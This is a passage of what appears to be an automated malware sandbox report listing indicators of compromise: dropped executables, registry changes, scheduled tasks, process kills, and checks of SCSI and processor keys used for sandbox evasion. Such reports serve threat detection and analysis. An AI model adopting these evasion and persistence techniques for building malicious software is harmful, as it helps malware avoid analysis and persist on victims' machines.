description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe a4hC89JjzvN7O07q6G1UDT5s.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File created C:\Program Files (x86)\WindowsPowerShell\Dedyfilytu.exe DYbALA.exe File created C:\Program Files (x86)\WindowsPowerShell\Dedyfilytu.exe.config DYbALA.exe File created C:\Program Files (x86)\FarLabUninstaller\is-B65M9.tmp Wed09d27135e5a8b3b.tmp File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe cAYo3Q8suZBbt4C5trcF26B3.exe File created C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Wed09d27135e5a8b3b.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe a4hC89JjzvN7O07q6G1UDT5s.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Conhost.exe File created C:\Program Files (x86)\Windows Multimedia Platform\SHaefasotega.exe.config DYbALA.exe File opened for modification C:\Program Files (x86)\O9r6hzlkh\_jxt0z7tbh.exe mstsc.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Wed09d27135e5a8b3b.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW jg1_1faf.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\RGRFZNFEOF\foldershare.exe.config DYbALA.exe File opened for modification C:\Program Files (x86)\O9r6hzlkh Explorer.EXE File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe a4hC89JjzvN7O07q6G1UDT5s.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini a4hC89JjzvN7O07q6G1UDT5s.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Conhost.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\RGRFZNFEOF\foldershare.exe DYbALA.exe File created C:\Program Files\7-Zip\XFWWFEGLBW\foldershare.exe DYbALA.exe File created C:\Program Files (x86)\Windows Multimedia Platform\SHaefasotega.exe DYbALA.exe File created C:\Program Files (x86)\O9r6hzlkh\_jxt0z7tbh.exe Explorer.EXE File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe cAYo3Q8suZBbt4C5trcF26B3.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb jg1_1faf.exe File created C:\Program Files\7-Zip\XFWWFEGLBW\foldershare.exe.config DYbALA.exe -
Drops file in Windows directory 45 IoCs
description ioc Process File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI80C0.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSIDCDC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4738.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4B8E.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI593E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI867E.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIE058.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI52F3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI78CE.tmp msiexec.exe File created C:\Windows\Installer\f7eb946.msi msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\f7eb943.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID75B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID96F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDAF7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8799.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSIE29B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI843B.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI4F87.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI8865.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri Explorer.EXE File created C:\Windows\Installer\f7eb943.msi msiexec.exe File opened for modification C:\Windows\Installer\MSICE13.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI57C6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7EFA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8F8B.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 13 IoCs
pid pid_target Process procid_target 5116 3960 WerFault.exe 97 5116 3960 WerFault.exe 97 5432 3960 WerFault.exe 97 6124 3960 WerFault.exe 97 4516 4868 WerFault.exe 130 5672 4588 WerFault.exe 125 6124 4868 WerFault.exe 130 6136 4172 WerFault.exe 136 6128 4868 WerFault.exe 130 6048 6116 WerFault.exe 173 5896 4868 WerFault.exe 130 4240 3960 WerFault.exe 97 3536 3164 WerFault.exe 147 -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A8A6.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C71D.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0hp5lI2f2FoyQfBIrXA9ES2X.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI SG5COJhctDghfNe0iIIPrpP1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI SG5COJhctDghfNe0iIIPrpP1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0hp5lI2f2FoyQfBIrXA9ES2X.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A8A6.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A8A6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C71D.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MicrosoftEdgeCP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed09b2a8bc4f16cb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 0hp5lI2f2FoyQfBIrXA9ES2X.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C71D.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI SG5COJhctDghfNe0iIIPrpP1.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mBeq4rQAAJTfUezIixpwFY0d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mBeq4rQAAJTfUezIixpwFY0d.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 D305.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString D305.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 B92C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString B92C.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mBeq4rQAAJTfUezIixpwFY0d.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mBeq4rQAAJTfUezIixpwFY0d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6156 schtasks.exe 8244 schtasks.exe 6516 schtasks.exe 9728 schtasks.exe 2400 schtasks.exe 4204 schtasks.exe 2284 schtasks.exe 3484 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 4624 timeout.exe 4960 timeout.exe 8204 timeout.exe 1628 timeout.exe 4432 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier chkdsk.exe -
Kills process with taskkill 16 IoCs
pid Process 9628 taskkill.exe 6568 taskkill.exe 7016 taskkill.exe 8576 taskkill.exe 9312 taskkill.exe 8992 taskkill.exe 4016 taskkill.exe 6704 taskkill.exe 6060 taskkill.exe 2164 taskkill.exe 9024 taskkill.exe 7156 taskkill.exe 5144 taskkill.exe 4136 taskkill.exe 6980 taskkill.exe 6388 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" mshta.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mshta.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \Registry\User\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 mstsc.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 19 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000e28645b71c12d0e6741cddc67ff95fbc426ec935f0ebe62af1def099f7c15bcaebe47046071860d8a4aa7645d35842838aef95f57c780b92f14686e2 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 25878e9240cbd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000 msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{U9IGI0Q2-B7HR-SAI9-Z61V-J0SY8EIASHJB}\7289246C77593EBF svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = d04eb7a840cbd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 046fb88140cbd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "984" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local 